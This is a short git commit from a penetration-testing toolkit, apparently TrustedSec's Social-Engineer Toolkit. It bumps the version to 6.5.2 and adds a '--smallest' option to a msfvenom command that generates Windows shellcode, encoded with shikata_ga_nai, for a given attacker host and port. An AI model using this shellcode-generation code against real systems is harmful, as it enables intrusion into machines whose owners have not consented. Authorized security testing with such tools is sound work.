added smallest payload

This commit is contained in:
TrustedSec 2015-08-04 14:53:34 -04:00
parent 7327f71a69
commit fcdf56a953
2 changed files with 8 additions and 2 deletions

View file

@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 6.5.2
~~~~~~~~~~~~~~~~
* added smallest payload option for msfvenom shellcode creation
~~~~~~~~~~~~~~~~
version 6.5.1
~~~~~~~~~~~~~~~~

View file

@ -233,7 +233,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '6.5.1'
define_version = '6.5.2'
return define_version
class create_menu:
@ -1285,7 +1285,7 @@ def generate_shellcode(payload,ipaddr,port):
msf_path = meta_path()
# generate payload
port = port.replace("LPORT=", "")
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows -f c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows --smallest -f c" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
data = proc.communicate()[0]
# start to format this a bit to get it ready
repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'unsigned char buf=' : '', 'unsignedcharbuf[]=' : ''}